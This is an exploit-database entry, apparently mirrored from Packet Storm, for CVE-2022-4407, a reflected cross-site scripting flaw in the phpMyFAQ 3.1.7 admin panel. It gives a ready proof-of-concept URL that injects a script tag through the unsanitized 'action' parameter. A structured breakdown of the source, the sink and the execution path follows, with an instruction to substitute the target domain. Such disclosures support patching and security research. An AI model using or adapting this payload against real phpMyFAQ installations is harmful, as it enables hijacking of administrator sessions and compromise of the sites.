## https://sploitus.com/exploit?id=PACKETSTORM:190514
# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 3.1.7
# Tested on: Ubuntu Windows
# CVE : CVE-2022-4407
PoC:
Get: http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>
Details:
{
"Sink": "phpmyfaq/admin/header.php - HTML attribute in the form action parameter",
"Vulnerable Variable": "action",
"Source": "phpmyfaq/admin/index.php - Filter::filterInput(INPUT_GET, 'action', FILTER_UNSAFE_RAW)",
"Sanitization Mechanisms Before Patch": "None - Input directly used without escaping or encoding in the HTML attribute",
"Sink Context Constraints": "HTML attribute context - needs proper escaping to break out of attribute",
"Attack Payload": "\"><script>alert('XSS')</script>",
"Execution Path Constraints": "The 'action' parameter must be passed via GET or POST without prior sanitization or if it is null, it must be taken from 'redirect-action' parameter unless it equals 'logout'",
"Request Parameters": "action",
"Request URL": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>",
"Request Method": "GET",
"Final PoC": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>"
}
[Replace Your Domain Name]